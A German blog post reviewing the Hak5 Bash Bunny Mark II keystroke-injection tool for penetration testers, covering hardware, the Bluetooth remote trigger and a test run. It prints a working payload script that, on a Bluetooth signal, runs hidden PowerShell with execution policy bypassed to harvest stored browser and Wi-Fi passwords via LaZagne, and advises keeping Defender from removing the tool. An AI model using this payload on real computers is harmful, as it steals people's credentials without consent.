Erster Test mit Bash Bunny Mark II

Viele Penetrationstester verwenden die Werkzeuge von Hak5, um z.B. bei physischem Zugriff auf ein Gerät, sogenannte „Keystroke Injection Angriffe“ auszuführen. Rubber Ducky und Bash Bunny aus diesem Hause verfügen über eine einfache Skriptsprache, die Sie in jedem Texteditor schreiben bzw. bearbeiten können. Hak5 hat mit dem Bash Bunny Mark II einen Nachfolger der legendären Werkzeuge herausgebracht. In diesem Beitrag wollen wir die Neuerungen aufzeigen und testen, ob sich der Kauf dieses neuen Tools lohnt.

Hardware und Formfaktor

Legt man die „Hasen“ nebeneinander, so sind keine großen Unterschiede zu erkennen. Der Nachfolger ist etwas dicker, obwohl sich die Hardwarespezifikationen kaum geändert haben. Der Mark II verfügt nun über 1 GB RAM (Vorgänger 512 MB), einem MixroSD XC Laufwerk mit einer max. Kapazität von 2 TB und über Bluetooth LE.

Auch in diesem Gerät werkelt eine Quad-Core A7 CPU mit 1,3 Ghz, die wohl weiterhin sehr ausreichend für die zahlreichen Anwendungen sein sollte.

Links Bash Bunny neue Version, rechts der Vorgänger

Neuerungen

Die wesentlichen Unterschiede sind auf der Webseite des Herstellers zusammengefasst.

Wenn man es genau betrachtet, so lassen sich die Änderungen im einem Satz zusammenfassen. Die Hersteller machen das folgendermaßen:

„The Bash Bunny Mark II adds mass exfiltration, wireless geofencing and remote trigger functionality via a MicroSD XC card reader and bluetooth low-energy radio.“

https://://docs.hak5.org/hc/en-us/articles/4402980129179-Bash-Bunny-Mark-II-Considerations

Im Bereich “Wireless” fügen sie die neuen Funktionen „WAIT_FOR_PRESENT“  und „WAIT_FOR_NOT_PRESENT“ hinzu.  Penetrationstester sind damit in der Lage, ihre Skripte so anzupassen, dass sie auf die „Anwesenheit“ bestimmter Bluetooth-Geräte reagieren. 

Beispiel:

Soll das Skript erst fortgesetzt werden, wenn ein Bluetooth-Signal eines Mobiltelefons mit dem Namen „myphone“ präsent ist, so fügt man folgenden Befehl ein:

WAIT_FOR_PRESENT myphone

Im Bereich „Storage“ kommen die diversen Möglichkeiten hinzu, die der Anwender durch das zusätzliche Micro-SD-Laufwerk hat. Je nach Angriffsmethode ergeben sich eine Reihe von Einsatzmöglichkeiten. Die wesentlichen Unterschiede finden Sie in der Dokumentation.

Micro-SD Laufwerk

Payload-Switch, hier Arming Mode

Erster Test mit dem Bash Bunny Mark II

Da wir immer kleine Datenmengen auf dem Bash Bunny gespeichert haben, hat uns der bereits im Vorgänger zur Verfügung gestellte Datenspeicher völlig ausgereicht. Die zusätzlichen Möglichkeiten (bis zu 2 TB) sind daher für uns eher nicht interessant. Die „Remote Trigger“-Funktion wollen wir uns aber etwas genauer ansehen.

Denkbar wäre hier eine Szenario in dem der Penetrationstester den Bash Bunny an einem Windows PC platziert und so lange wartet bis der Anwender das Gerät entsperrt, um es zu nutzen. Erst dann schaltet er Bluetooth auf seinem Gerät „myphone“ ein und löst dann dass Skript zum Abgreifen der Passwörter aus.

Wir verwenden dafür den Payload „PasswordGrabber“, der bei Github heruntergeladen werden kann. Mit ihm ist der Anwender in der Lage, gespeicherte Passwörter aus verschiedenen Anwendungen (z.B. Browsern) oder WLAN-Verbindungen auszulesen. Dabei kommt das Tool LaZagne zum Einsatz. Die exe-Datei muss daher von der Webseite heruntergeladen und auf dem BashBunny im Verzeichnis /tools gespeichert werden. Verwenden Sie dazu den Arming Mode des Bash Bunny.

Hinweise: Der Microsoft-Defender stuft dieses Werkzeug als maliziös ein. Passen Sie daher ihr Testsystem so an, dass es nach dem Download nicht automatisch gelöscht wird.

Die Dateien payload.ps1 und payload.txt kopieren Sie in eines der beiden Payload-Verzeichnisse des Bash Bunny.  Sie können die Daten dann später mit dem roten Schalter entweder aus Switch1 oder Switch2 abrufen. 

Hinweis: Die Schalterstellung Arming Mode befindet sich am dichtesten zur USB-Schnittstelle des Bash Bunny und Switch1 am entferntesten. 

Nun müssem wir die Datei payload.txt noch anpassen, um die Remote Trigger Funktion zu nutzen. Für unseren Test sieht das dann so aus:

# Options
LOOTDIR=/root/udisk/loot/PasswordGrabber

######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE

######## MAKE LOOT DIRECTORY ########
# Setup named logs in loot directory
mkdir -p $LOOTDIR

######## WAIT FOR phone ########
ATTACKMODE STORAGE
LED STAGE1
WAIT_FOR_PRESENT Find Me

######## ATTACK ########
LED ATTACK
RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')"
# Wait until passwords are grabbed.
sleep 10

######## FINISH ########
LED FINISH

Um das Bluetooth-Signal zu erzeugen, das dann den „Remote Trigger“ auslöst, benutzen wir ein IPhone mit der App „BLE Scannner“. Dazu habe wir einen „Advertiser“ mit Name „Find Me“ erstellt.

Sobald der Bunny das Signal erkennt, wird das Powershell-Skript payloads.ps1 gestartet und die gefundenen Passworte im /loot Verzeichnis des Bash Bunny gespeichert.

Eine Demonstration der neuen Funktion sehen sie im folgenden Video:

Unser Fazit

Der Nachfolger des Bash Bunny ist für Penetrationstester interessant, die große Datenmengen verarbeiten oder die Remote Trigger Funktionen für ihre Prüfungen benötigen.

Einen WLAN-Zugang und eine lokale Webseite für eine komfortable Konfiguration des „Hasen“ sucht man weiterhin vergeblich.

Wer den Vorgänger besitzt und die neuen Funktionen nicht benötigt, sollte das Geld für den Kauf eines zusätzlichen Gerätes sparen. Derzeit ist das Werkzeug in den USA ab 119,99 $ + Versand und Zollgebühren und in Deutschland für 145 € zzgl. Versand erhältlich. 

Schreibe einen Kommentar

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.